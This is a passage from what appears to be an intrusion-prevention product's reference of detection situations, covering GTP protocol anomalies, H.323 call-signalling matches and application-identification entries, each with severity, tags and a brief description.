Back to top

GTP_Invalid-Extheader-Length

About this situation: Message contains Extension Header with invalid length.
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The message contains an Extension Header with invalid length. Risk analysis: Risk level is medium.
Back to top

GTP_IP-Missing

About this situation: Information Element should provide some IP address, but is empty
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: According to 3GPP Technical Specification, one of Information Element should provide IP address. For some reasons this Information Element don't provide IP address. Risk analysis: Risk level is low.
Back to top

GTP_IPv6_not_supported

About this situation: GTP inspection is not supported in IPv6 traffic
Context: GTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Description: GTP inspection is not supported in IPv6 traffic. Risk analysis: Risk level is low.
Back to top

GTP_Mandatory-IE-Missing

About this situation: Message does not contain all mandatory Information Elements
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Message does not contain all required Mandatory Information Elements. According to 3GPP Technical Specification, GTP message shoud contain a number of mandatory Information Elements, but received message did not contain some of them. Risk analysis: Risk level is low.
Back to top

GTP_Message-Overflow

About this situation: GTP Message Overflow
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The message contained more data than declared in the GTP header. Risk analysis: Risk level is high.
Back to top

GTP_Missing-Seq-Number

About this situation: Sequence number in GTP header was missing for mandatory scenario
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: From GTP Spec GPP_TS_29.060 chapter 8.2 Usage of the GTP-C Header: - Sequence number flag (S) shall be set to "1". End of quotation. By spec definition, all GTP-C messages has to have the Sequence Number flag set to '1' and therefore Sequence Number for all such message must be defined. This situation should be treated as protocol violation. Even one of such situation should be treated as anomaly or attack. Risk analysis: Risk level is medium.
Back to top

GTP_Missing-TEID

About this situation: GTP Message Header is missing TEID
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Protocol violation. GTP Message header is missing TEID field, while message requires it. Risk analysis: Risk level is medium.
Back to top

GTP_NSAPI-does-not-match

About this situation: GTP NSAPI does not match
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: GTP Information Element NSAPI invalid value. This situation happens when NSAPI value does not match PDP context request and response. Risk analysis: Risk level is low.
Back to top

GTP_PDP-Context-Created

About this situation: GTP PDP Context create confirmed
Context: GTP without parameters
Severity: 1
Tags: Access
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: PDP Context deletion has been confirmed by GGSN.
Back to top

GTP_PDP-Context-Deleted

About this situation: GTP PDP Context delete confirmed
Context: GTP without parameters
Severity: 1
Tags: Access
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: A PDP Context deletion has been confirmed by GGSN. No further traffic should be passwed in related tunnel.
Back to top

GTP_PDP-context-Updated

About this situation: Sucessfull PDP CTX update was seen
Context: GTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Sucessfull PDP CTX update was seen
Back to top

GTP_PDP-CTX-Not-Found

About this situation: GTP PDP CTX not found
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: Corresponding PDP Context was not found. Risk analysis: Risk level is low.
Back to top

GTP_PDP_CTX-invalid-state

About this situation: GTP Invalid State
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: Tunnel is in state that forbids requested operation. Risk analysis: Risk level is low.
Back to top

GTP_PDP_CTX_24h_Timeout

About this situation: GTP PDP Context found unused for 24h
Context: GTP without parameters
Severity: 1
Tags: Probe
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description: One of existing GTP PDP CTX is unused for 24h. Terminating this situation will close timed out GTP PDP Context and will not allow further traffic for this channel. Otherwise, GTP PDP Context will be kept intact. Risk analysis: Risk level is low.
Back to top

GTP_Redundant-IE

About this situation: Message contain redundant Information Elements
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Message contain redundant Information Elements. According to 3GPP Technical Specification, any GTP message should contain only a limited set of information elements, but received message has an Information Element that is not required by standard. Risk analysis: Risk level is low.
Back to top

GTP_Spoofed-PDP-Context-Delete

About this situation: Found GTP PDP Context Delete that looks spoofed
Context: GTP without parameters
Severity: 5
Tags: Probe
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Description: GTP PDP Contex Delete Request with not matched TEID and IP. Sender should not have knowledge about this tunnel, and also should not try to delete this tunnel. Risk analysis: Risk level is High.
Back to top

GTP_Superfluous-NPDU

About this situation: N-PDU field in GTP header was set to value different than 0 in non-N-PDU related scenario
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: From GTP Spec GPP_TS_29.060 chapter 8.2 Usage of the GTP-C Header: - N-PDU Number flag (PN) shall be set to "0". A GTP-C receiver shall not return an error if this flag is set to "1" By spec definition, all GTP-C messages has to have the N-PDU Number flag set to '1' and therefore N-PDU Number for all such message should not be defined. This situation should be treated as protocol violation. Even one of such situation should be treated as anomaly or attack. Risk analysis: Risk level is medium.
Back to top

GTP_Superfluous-TID

About this situation: TID field in GTP header was set to value different than 0 in non-TID related scenario
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Superflous TEID was detected This situation will happen when message uses TEID header field different than 0, while it should not (for messages for which TEID usage is forbiden please refer to GPP_TS_29.060 chapter 8.2 Usage of the GTP-C Header). This situation should be treated as protocol violation. Even single situation of such type, should be treated as anomaly or attack. From GTP Spec GPP_TS_29.060 chapter 8.2 Usage of the GTP-C Header: The Tunnel Endpoint Identifier is set by the sending entity to the value requested by the corresponding entity (SGSN or GGSN) ... except for the following cases (in all below cases it should be set to zero) - Create PDP Context Request message and the Create MBMS Context Request message for a given MS sent to a specific GGSN if the SGSN has not been assigned a Tunnel Endpoint Identifier Control Plane by the GGSN. - The Identification Request/Response messages. - The SGSN Context Request message. - The Echo Request/Response, Supported Extension Headers notification and the Version Not Supported messages. - The Forward Relocation Request message. - The PDU Notification Request message. - The MBMS Notification Request message. - The RAN Information Relay message. - The Relocation Cancel Request message except for the case where the old SGSN has already been assigned the Tunnel Endpoint Identifier Control Plane of the new SGSN. - All Location Management messages - If a GSN receives a GTP-C message requesting action related to a PDP context that the sending node believes is in existence, but that is not recognised by the receiving node, the receiving node shall send back to the source of the message, a response with the appropriate cause value (either "Non-existent" or "Context not found"). The Tunnel Endpoint Identifier used in the response message shall be set to all zeroes. Risk analysis: Risk level is medium.
Back to top

GTP_TEID_Collision

About this situation: GTP TEID Collision
Context: GTP without parameters
Severity: 8
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: GTP TEID,NSAPI pair collistion detected This situation will happen when the same TEID and NSAPI are used for two different PDP contexts. This is a protocol violation and may be used as an attack attempt to steal the user plane data. Risk analysis: Risk level is high.
Back to top

GTP_Tunneling-GTP-In-GTP

About this situation: Found GTP tunnel inside GTP packet payload
Context: GTP without parameters
Severity: 5
Tags: Probe
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-577-5211
Description: Putting GTP protocol inside GTP packet payload is well know attack method on GTP protocol. Risk analysis: Risk level is Very High.
Back to top

GTP_Unexpected-Message-Value

About this situation: Part of GTP message have an unexpected value.
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Part of GTP message have an unexpected value. Risk analysis: Risk level is low.
Back to top

GTP_Unexpected-Seq-Number

About this situation: Sequence number in GTP header was out of expected range
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The received sequence number for G-PDU is out of expected range. The range validation algorithm is described in 3GPP TS 29.060 V12.0.0 Annex A (A method for sequence number checking). This situation can be threated as information about possible network problem (like for e.g. single duplicated GTP packet) or warning about single packet injection attack try. Multiple of such situations may be sign for an pending attack attempt. Risk analysis: Risk level is medium.
Back to top

GTP_Unexpected-Update

About this situation: Unexpected PDP Update Context Request/Response
Context: GTP without parameters
Severity: 8
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Unexpected PDP Update Context Request/Response was received but there was no PDP CTX created beforehand for particular virtual GTP connection. This is protocol violation since GSN cannot refer non existing PDP Context. This situation should be treated as an attack attempt. Risk analysis: Risk level is high.
Back to top

GTP_Unexpected_Response

About this situation: GTP Unexpected Response
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: GTP Unexpected response detected This situation will happen when Engine will receive response without prior request. All requests are tracked on Engine separately for each connection by using of sequence numbers. This situation is a protocol violation but may be also caused by duplicated response message. Situation may be safely ignored unless it does not appear as a flood. Flood of such situations is probably attack attempt, usualy used for guessing the sequence numbers or TEID. Risk analysis: Risk level is medium.
Back to top

GTP_Unhandled-Parse-Error

About this situation: Message contains malformed data which could not be parsed
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The message contained data which could not be parsed at all, e.g. because of malformed header. Risk analysis: Risk level is high.
Back to top

GTP_Unknown-Extheader

About this situation: Unknown GTP Extension Header
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The message contains an unknown Extension Header. Risk analysis: Risk level is low.
Back to top

GTP_Unknown-IE

About this situation: Unknown GTP Information Element
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The message contains an unknown Information Element. Risk analysis: Risk level is medium.
Back to top

GTP_Unknown-Message

About this situation: Unknown GTP Message
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The message type is unknown. Risk analysis: Risk level is medium.
Back to top

GTP_Unknown-Protocol

About this situation: GTP-C/GTP-U protocol detection was not able to detect the protocol type
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: In some cases GTP parser is not able to detect GTP-C/GTP-U connection protocol (assigned to GTP agent). This may happen in case of non standard ports (other than those defined by specification 2123 or 2152) This situation should be treated as protocol violation. GTP traffic should use the standard ports. Risk analysis: Risk level is low.
Back to top

GTP_Unknown-Source

About this situation: GTP Unknown Source
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: GTP stream source is unknown. Risk analysis: Risk level is low.
Back to top

GTP_Unsupported-Protocol

About this situation: Unsupported GTP Protocol
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: GTP Protocol specified in message header is currently unsupported or it does not exist. Risk analysis: Risk level is low.
Back to top

GTP_Unsupported-Version

About this situation: Unsupported GTP Version
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: GTP Version specified in message header is currently unsupported or it does not exist. Risk analysis: Risk level is low.
Back to top

GTP_Used-Spare

About this situation: One of information elements contains unexpected data
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: One of information elements contains some data in place which should be left unused. According to 3GPP Technical Specification this data is not used, and is marked as "spare". Risk analysis: Risk level is low.
Back to top

GTP_Wrong-Port

About this situation: Message sent on wrong port number
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: A GTP message has been sent using port number other than the one defined by the specification. For example, a GTP version 0 message should not use port number reserved for GTP version 1. Risk analysis: Risk level is low.
Back to top

GTP_Wrong-Value

About this situation: One of information elements have incompatible value
Context: GTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: One of information elements have a value inconsistent with the 3GPP Technical Specification. Risk analysis: Risk level is low.
Back to top

Guardian-Life-Insurance

About this situation: Application Guardian-Life-Insurance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Guardian Life Insurance Company of America is mutual life insurance company
Back to top

Guavus

About this situation: Application Guavus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Guavus provides the only operational intelligence platform that delivers an end-to-end, real-time view across business operations and currently processes over half a trillion records every day. The Guavus Reflex operational intelligence platform correlates and analyzes massive petabytes of streaming and stored business, operational and sensor data from multiple, disparate source systems in real-time.
Back to top

GuestCentric-Integrated-platform

About this situation: Application GuestCentric-Integrated-platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hotel digital marketing in the cloud for independent hotels and boutique brands.
Back to top

Guidance-Software

About this situation: Application Guidance-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EnCase - Digital Forensics Software, Cyber Security Software, and E-Discovery Software solutions.
Back to top

Guidewire

About this situation: Application Guidewire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Guidewire provide a software products that help Property
Back to top

Guildwars2

About this situation: Application Guildwars2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Guild Wars 2 is a massively multiplayer online role-playing game.
Back to top

Gumtree

About this situation: Application Gumtree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gumtree.com is an online classifieds and community website. Classified ads are either free or paid for depending on the product category and the geographical market.
Back to top

gUnify

About this situation: Application gUnify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: gUnify extends communications into cloud based business applications like Google for Work, Salesforce, Zendesk and Clio. Click right from within Google, Salesforce, Zendesk and Clio
Back to top

Gurock-Software

About this situation: Application Gurock-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gurock Software is specialized in tools for software development teams and quality assurance departments. Gurock Software builds SmartInspect and TestRail, two popular software development and testing products.
Back to top

Guru.com

About this situation: Guru.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Guru.com allows companies to find freelance workers for commissioned work.
Back to top

GXS-RollStream

About this situation: Application GXS-RollStream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GXS Active Community (formerly RollStream, now part of OpenText) is a provider of enterprise community management software. Specifically, GXS Active Community delivers an online solution for accelerating communications and collaboration across the global supply chain. The platform provides an easy way for suppliers to keep their contact details, billing information and insurance credentials up-to-date.
Back to top

Gyao!

About this situation: GyaO! usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A video distribution site
Back to top

Gyao-Webmail

About this situation: Gyao Webmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Japanese Browser-based Email service.
Back to top

Gym-Master

About this situation: Application Gym-Master detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gym Master is an solution that adapts to business. It is providing the manageability of organization health clubs and gym and increasing member management operation.
Back to top

H2Desk

About this situation: Application H2Desk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: H2Desk provides Help desk, live chat, and customer service software to improve customer support.
Back to top

H323_CS-Message-Alerting

About this situation: Matches when a H.323 (H.225/Q.931) call signalling Alerting message is seen.
Context: H.323 Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic H.323 client, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Description:
Back to top

H323_CS-Message-Call-Proceeding

About this situation: Matches when a H.323 (H.225/Q.931) call signalling Call Proceeding message is seen.
Context: H.323 Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic H.323 client, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Description:
Back to top

H323_CS-Message-Connect

About this situation: Matches when a H.323 (H.225/Q.931) call signalling Connect message is seen.
Context: H.323 Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic H.323 client, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Description:
Back to top

H323_CS-Message-Release-Complete-From-Callee

About this situation: Matches when a H.323 (H.225/Q.931) call signalling Release Complete message is seen, sent by the callee.
Context: H.323 Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic H.323 client, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Description:
Back to top

H323_CS-Message-Release-Complete-From-Caller

About this situation: Matches when a H.323 (H.225/Q.931) call signalling Release Complete message is seen, sent by the initiator of the call.
Context: H.323 Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic H.323 client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Description:
Back to top

H323_CS-Message-Setup

About this situation: Matches when a H.323 (H.225/Q.931) call signalling Setup message is seen.
Context: H.323 Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic H.323 client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Description:
Back to top

Habbo

About this situation: Habbo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: Habbo is a social networking site that allows users to meet and make friends, play games and chat.
Back to top

HabitMix

About this situation: Application HabitMix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HabitMix recording your daily tasks, to do items and Commitment Statement.
Back to top

HackerOne

About this situation: HackerOne usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: HackerOne is a bug bounty and vulnerability management service.
Back to top

HackerRank

About this situation: Application HackerRank detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HackerRank is a platform that is used by programmers to hone their skills and by companies to recruit tech talent.
Back to top

Hacking

About this situation: Sites that provide information about or promote illegal or questionable access to or use of computer or communication equipment, software or databases.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Security Risk, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote illegal or questionable access to or use of computer or communication equipment, software or databases.
Back to top

Haiku-Deck

About this situation: Application Haiku-Deck detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Haiku Deck provides online presentation software.
Back to top

Haiku-LMS

About this situation: Application Haiku-LMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Haiku Learning provides cloud-based tools designed to get you up and running with digital learning in minutes.
Back to top

Hallmark

About this situation: Application Hallmark detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hallmark is a ecards, personalized greeting cards, photo cards, Keepsake Ornaments and gifts, invitations, announcements and special offers online shop.
Back to top

HAMS-GPS-EHS-Software

About this situation: Application HAMS-GPS-EHS-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HAMS-GPS EHS Software provides advanced Windows based software for Environment, Health and Safety
Back to top

Handelsbanken

About this situation: Handelsbanken usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Handelsbanken usage detected. Handelsbanken is a Nordic bank.
Back to top

HANDS-HQ

About this situation: Application HANDS-HQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HANDS HQ provides health and safety tool for creating project risk assessments and method statements.
Back to top

Handset-Detection

About this situation: Application Handset-Detection detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Handset Detection makes it easy to detect thousands of mobile devices, redirect mobile visitors to your mobile site and understand your mobile audience.
Back to top

Handshake

About this situation: Application Handshake detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Handshake is the B2B commerce platform. It helps taking orders, driving sales, developing customer partnerships.
Back to top

Handy-Backup

About this situation: Application Handy-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Handy Backup is an automated backup and recovery solution for any home PC or business server
Back to top

Handy-Hardware

About this situation: Application Handy-Hardware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Handy Hardware LLC is a privately-owned hardware distribution company. Handy Hardware's customers are independently owned retail hardware stores
Back to top

Handzon

About this situation: handzon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Hangame

About this situation: Hangame usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: This site is a Japanese gaming service that allows users to play games or obtain information.
Back to top

Hansaworld

About this situation: Application Hansaworld detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HansaWorld a software house to provide a full suite of Enterprise Resource Planning, Financials and Customer Relationship Management as well as a wide selection of industry-specific solutions on tablets and smartphones.
Back to top

Hao123

About this situation: Hao123 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-630-5211
Description: Hao123 is an online listing portal by Baidu.
Back to top

HappyCo

About this situation: Application HappyCo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HappyCo is a mobile software platform to inspect, monitor and analyze the performance of your enterprise business assets in real time.
Back to top

HappyFox

About this situation: Application HappyFox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HappyFox is a Cloud based Help Desk software that is developed by a super passionate technology team that is experienced in solving customer support problems.
Back to top

HardisGroup

About this situation: Application HardisGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HardisGroup is an IT consulting company and a software publisher, provides to customers end to end support in optimising the performance of information systems and supply chain, as well as in digitalising services.
Back to top

Harlequin-Games

About this situation: Harlequin Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

HarmonyPSA

About this situation: Application HarmonyPSA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HarmonyPSA - professional services automation on the market. Specifically designed for technology businesses, Harmony will run your entire business, from campaign management, through opportunities and quoting, to delivery and accounting. Along the way it also handles your service desk, purchasing and project management needs.
Back to top

Harvard-Business-Review

About this situation: Application Harvard-Business-Review detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Harvard Business Review is the destination for management thinking.
Back to top

Harvest

About this situation: Application Harvest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Harvest is a provider of agile project management for simple time tracking, online invoicing, and reporting software, simplify employee timesheets and billing.
Back to top

HasOffers

About this situation: Application HasOffers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HasOffers is performance marketing and attribution analytics. Unbiased, proven technology for performance advertising.
Back to top

Hatchbuck

About this situation: Application Hatchbuck detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hatchbuck merges small business crm functionality and automated marketing software in an easy-to-use solution geared for smaller businesses.
Back to top

Hatena-Diary

About this situation: Hatena Diary usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

Haveamint

About this situation: Application Haveamint detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The original Mint. Mint is the only self-hosted, real-time, extensible web stats app. Satisfy your sweet tooth for site stats and get Minted
Back to top

hazMIN

About this situation: Application hazMIN detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: hazMIN provides SDS, MSDS software modules providing management, chemical inventory, waste tracking, environmental reporting, a database of regulated chemicals, and a committee review system.
Back to top

Hbo

About this situation: HBO usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1676-5242
